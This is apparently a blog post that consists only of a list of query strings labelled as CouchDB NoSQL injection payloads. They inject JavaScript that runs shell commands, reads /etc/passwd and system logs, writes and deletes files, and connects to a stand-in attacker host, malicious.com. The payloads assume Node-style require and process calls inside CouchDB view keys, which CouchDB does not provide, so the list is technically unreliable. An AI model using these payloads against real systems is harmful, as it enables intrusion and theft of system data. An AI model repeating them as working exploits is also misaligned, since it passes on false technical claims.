[CouchDB] NoSQL Injection Payloads

Wermut 2025. 2. 27. 01:30

 

"_design/design_doc/_view/view_name?key=value"
"_design/design_doc/_view/view_name?key=javascript:evilCode"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('ls').toString()"
"_design/design_doc/_view/view_name?key=javascript:process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('http').get('http://malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('os').hostname()"
"_design/design_doc/_view/view_name?key=javascript:process.exit()"
"_design/design_doc/_view/view_name?key=javascript:eval('console.log(1)')"
"_design/design_doc/_view/view_name?key=javascript:require('fs').writeFileSync('/tmp/malicious', 'data')"
"_design/design_doc/_view/view_name?key=javascript:require('net').connect(1234, 'malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').exec('ls', (err, stdout) => console.log(stdout))"
"_design/design_doc/_view/view_name?key=javascript:eval('console.log(require("os").totalmem())')"
"_design/design_doc/_view/view_name?key=javascript:require('http').request({hostname: 'malicious.com', path: '/payload', method: 'POST'}).end()"
"_design/design_doc/_view/view_name?key=javascript:require('https').get('https://malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('uname -a').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('path').resolve('/etc/passwd')"
"_design/design_doc/_view/view_name?key=javascript:eval('require(\"child_process\").execSync(\"whoami\").toString()')"
"_design/design_doc/_view/view_name?key=javascript:require('os').platform()"
"_design/design_doc/_view/view_name?key=javascript:require('crypto').randomBytes(256).toString('hex')"
"_design/design_doc/_view/view_name?key=javascript:require('fs').readFile('/etc/passwd', 'utf8', (err, data) => console.log(data))"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').spawnSync('ls', ['-l'])"
"_design/design_doc/_view/view_name?key=javascript:require('url').parse('http://malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').exec('whoami', (err, stdout) => console.log(stdout))"
"_design/design_doc/_view/view_name?key=javascript:process.env.NODE_ENV"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('date').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('fs').unlink('/tmp/malicious', (err) => console.log('Deleted'))"
"_design/design_doc/_view/view_name?key=javascript:eval('require(\"os\").cpus()')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('cat /var/log/syslog').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('crypto').createHash('sha256').update('data').digest('hex')"
"_design/design_doc/_view/view_name?key=javascript:require('os').userInfo()"
